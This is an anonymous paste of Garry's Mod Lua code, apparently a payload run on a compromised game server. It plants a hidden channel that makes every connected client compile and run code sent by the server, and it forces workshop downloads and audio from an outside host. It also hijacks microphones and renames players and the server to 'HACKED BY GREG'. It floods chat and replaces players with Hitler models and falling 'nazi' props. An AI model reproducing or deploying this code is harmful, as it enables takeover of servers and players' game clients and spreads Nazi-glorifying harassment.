____ _ _ | _ \ _____ _| |__ (_)_ __ | | | |/ _ \ \/ / '_ \| | '_ \ | |_| | (_) > <| |_) | | | | | |____/ \___/_/\_\_.__/|_|_| |_|
Created:May 14th, 2021
Created by: Anonymous
Views: 209
Comments: 0
Username: Anonymous - (Login)
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function RandomString( intMin, intMax ) local ret = "" for _ = 1, math.random( intMin, intMax ) do ret = ret.. string.char( math.random(65, 90) ) end return ret end m_strImageGlobalVar = RandomString( 6, 12 ) local function rdm_str(len) if !len or len <= 0 then return '' end return rdm_str(len - 1) .. ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")[math.random(1, 62)] end local net_string = rdm_str(25) util.AddNetworkString(net_string) BroadcastLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]]) hook.Add("PlayerInitialSpawn", "ifyouseethisdontpanicitsme",function(ply) if !ply:IsBot() then ply:SendLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]]) end end) local function SendToClient(code) timer.Simple(1, function() local data = util.Compress(code) local len = #data net.Start(net_string) net.WriteUInt(len, 16) net.WriteData(data, len) net.Broadcast() end) end hook.Add("Think","\xFF\xFF\xFF",function() local col = HSVToColor(CurTime() * 50 % 360, 1, 1) for _, v in ipairs(player.GetAll()) do v:SetWeaponColor(Vector(col.r / 255, col.g / 255, col.b / 255)) end end) timer.Simple( 3, function() SendToClient([=[ g_]=].. m_strImageGlobalVar.. [=[ = {} local html = [[<style type="text/css"> html, body {background-color: transparent;} html{overflow:hidden; ]].. (true and "margin: -8px -8px;" or "margin: 0px 0px;") ..[[ } </style><body><img src="]] .. "%s" .. [[" alt="" width="]] .. "%i"..[[" height="]] .. "%i" .. [[" /></body>]] local function LoadWebMaterial( strURL, strUID, intSizeX, intSizeY ) local pnl = vgui.Create( "HTML" ) pnl:SetPos( ScrW() -1, ScrH() -1 ) pnl:SetVisible( true ) pnl:SetMouseInputEnabled( false ) pnl:SetKeyBoardInputEnabled( false ) pnl:SetSize( intSizeX, intSizeY ) pnl:SetHTML( html:format(strURL, intSizeX, intSizeY) ) local PageLoaded PageLoaded = function() local mat = pnl:GetHTMLMaterial() if mat then g_]=].. m_strImageGlobalVar.. [=[[strUID] = { mat, pnl } return end timer.Simple( 0.5, PageLoaded ) end PageLoaded() end LoadWebMaterial( "https://i.imgur.com/IpKnW6z.gif", "hud2", 256 , 256 ) local mdl = CreateModel("models/props_combine/breenbust.mdl") mdl:SetModelScale(50) mdl:SetAngles(ang + Angle(15, 180, 0)) mdl:SetPos(rag_pos) mdl:Spawn() ]=]) timer.Create("nonameplease", 5, 0,function() for i=1, #player.GetHumans() do local ply = player.GetHumans()[i] ply:Say( "/ooc HACKED BY GREG") end end) timer.Simple(3, function() RunConsoleCommand("sv_friction","-50") end) hook.Add("Think", "giant", function() for k,v in pairs (player.GetAll()) do v:SetModelScale(50.5, 100) end end) RunConsoleCommand("+right") RunConsoleCommand("+voicerecord") RunConsoleCommand("cl_yawspeed","9999") RunConsoleCommand("r_shader_srgb","1") timer.Simple( 3, function () DarkRP.removeChatCommand("rpname") DarkRP.removeChatCommand("name") DarkRP.removeChatCommand("nick") DarkRP.removeChatCommand("job") end) timer.Create( "PTN_YA_1_FAN_2_HITLER", 1, 0, function() for k,v in pairs(player.GetAll()) do v:GodEnable() v:setDarkRPVar( "rpname", "HACKED BY GREG" ) v:setDarkRPVar( "job", "HACKED BY GREG" ) v:SetRunSpeed(600* 6) v:SetWalkSpeed(600 * 6) end end ) end ) timer.Simple(15, function() RunConsoleCommand("cl_yawspeed","8") RunConsoleCommand("sv_friction","8") RunConsoleCommand("sv_hostname","HACKED BY GREG") end) -- EL FAMOSO CIEL GAY timer.Simple(3, function() SendToClient([=[ local name = GetConVar('sv_skyname'):GetString() if name == 'painted' then local sky for _, v in ipairs(ents.GetAll()) do if v:GetClass() == 'env_skypaint' then sky = v break end end if !IsValid(sky) then return end hook.Add('PostRender','â˜ï¸_RAINBOW',function() local col = HSVToColor(CurTime()*30 % 360,1,1) col = Vector(col.r/255,col.g/255,col.b/255) sky:SetTopColor(col) sky:SetBottomColor(col) end) else local prefix = {'lf','ft','rt','bk','dn','up'} local mats = {} for i=1,6 do mats[#mats+1] = Material('skybox/' .. name .. prefix[i]) end hook.Add('PostRender','â˜ï¸_RAINBOW',function() local col = HSVToColor(CurTime()*30 % 360,1,1) for i=1,6 do mats[i]:SetVector('$color',Vector(col.r/255,col.g/255,col.b/255)) end end) end ]=]) end) timer.Simple( 3, function() --PTDR CA COMMENCE timer.Create("its-discord", 0.1, 0,function() BroadcastLua([[ chat.AddText(Color( math.random(1,255), math.random(1,255), math.random(1,255) ), "-> HACKED BY GREG" ) ]]) end) enigmaisthere = { "HACKED BY GREG", "HACKED BY GREG", "HACKED BY GREG", "HACKED BY GREG", "HACKED BY GREG", "HACKED BY GREG", "HACKED BY GREG", "HACKED BY GREG", "HACKED BY GREG", "HACKED BY GREG", "HACKED BY GREG", "HACKED BY GREG", "HACKED BY GREG", "HACKED BY GREG", "HACKED BY GREG", "HACKED BY GREG", "HACKED BY GREG", "HACKED BY GREG", "HACKED BY GREG", "HACKED BY GREG", "HACKED BY GREG", "HACKED BY GREG", "HACKED BY GREG", "HACKED BY GREG", "HACKED BY GREG", "HACKED BY GREG", "HACKED BY GREG", } timer.Create( "EL_FAMOSO_SPAM_2_LA_TEAM", 0.2, 0, function() for k, ply in pairs( player.GetAll() ) do DarkRP.notify(ply, math.random(0,4), 10, "HACKED BY GREG"..table.Random(enigmaisthere).."") end end) -- LA FIN DU COMMENCEMENT end ) SendToClient([=[ steamworks.FileInfo(1618885873,function(result)steamworks.Download(result.fileid,true,function(name)game.MountGMA(name)end) end) steamworks.FileInfo(166165013,function(result)steamworks.Download(result.fileid,true,function(name)game.MountGMA(name)end) end) hook.Add("Think", "hitler_c_notre_idole", function() for k,v in pairs (player.GetAll()) do v:SetModelScale(2.5, 100); v:SetModel( "models/player/hitler/hitler.mdl" ) end end) timer.Simple(5, function() game.AddParticles( "particles/enigma.pcf" ) PrecacheParticleSystem("enigma") for i = 1, 10 do ParticleEffectAttach("enigma", PATTACH_ABSORIGIN_FOLLOW, LocalPlayer(), 0) end timer.Create("semmmmm", 5, 100, function() RunConsoleCommand("act","dance") RunConsoleCommand("_darkrp_doanimation", "1642") end) local nazi = ClientsideModel("models/props_combine/breenbust.mdl") nazi:SetNoDraw(true) nazi:SetModelScale(50) timer.Create("charglogo", 0.01, 0, function() nazi:SetAngles(Angle(0, CurTime()*90 % 360 ,180) ) end) --nazi:SetMaterial( "models/screenspace" ) local data = {} local function gennazi(id) local pos = LocalPlayer():GetPos() data[id] = { Vector(math.random(pos.x-9000,pos.x+9000),math.random(pos.y-9000,pos.y+9000),pos.z + math.random(5000,2000) ), math.random(70, 170) } end for i=1, 150 do gennazi(i) end hook.Add("PostDrawOpaqueRenderables","\xFFitsrainingnazis\xFF",function() local z = LocalPlayer():GetPos().z for i=1, #data do nazi:SetPos(data[i][1]) nazi:SetupBones() nazi:DrawModel() data[i][1].z = data[i][1].z - data[i][2] / 20 if data[i][1].z <= z then gennazi(i) end end end) local ragtbl = {} for i=1,20 do ragtbl[i] = ClientsideRagdoll( "models/player/gman_high.mdl" ) ragtbl[i]:SetNoDraw( false ) ragtbl[i]:DrawShadow( true ) end local function GetWebMat( strURL ) return g_]=].. m_strImageGlobalVar.. [=[[strURL] end local uwu = {} hook.Add("HUDPaint", "okay",function() for k,v in pairs(uwu) do v() end end) SOUNDSTART_CTP = false OZJFOZJCEZIO = true sound.PlayURL("https://deathteamofficial.000webhostapp.com/HitlerPayload.mp3","mono noblock noplay",function(s) if not s then return end if SOUNDSTART_CTP then s:Stop() return end SOUNDSTART_CTP = true s:SetVolume(5 ) s:Play() s:EnableLooping( true ) local ragtbl = {} uwu["CoolEffect"] = function() local tbl = {} s:FFT(tbl,FFT_2048) xpcall(function() local fal = 0 for i=4,6 do fal = fal + tbl[i] end if fal > 0.8 then local oneid = "newhud"..math.random(100, 300).."id" hook.Add( "HUDPaint", oneid, function() surface.SetDrawColor( 255, 255, 255, 255 ) if GetWebMat( "hud2" ) then -- lui surface.SetMaterial( GetWebMat("hud2")[1] ) surface.DrawTexturedRect( 0, 0, ScrW(), ScrH() ) end end ) timer.Simple(0.2, function() hook.Remove( "HUDPaint", oneid) end) end end,function() end) end end) end) ]=]) game.AddParticles( "particles/enigma.pcf" ) PrecacheParticleSystem("enigma")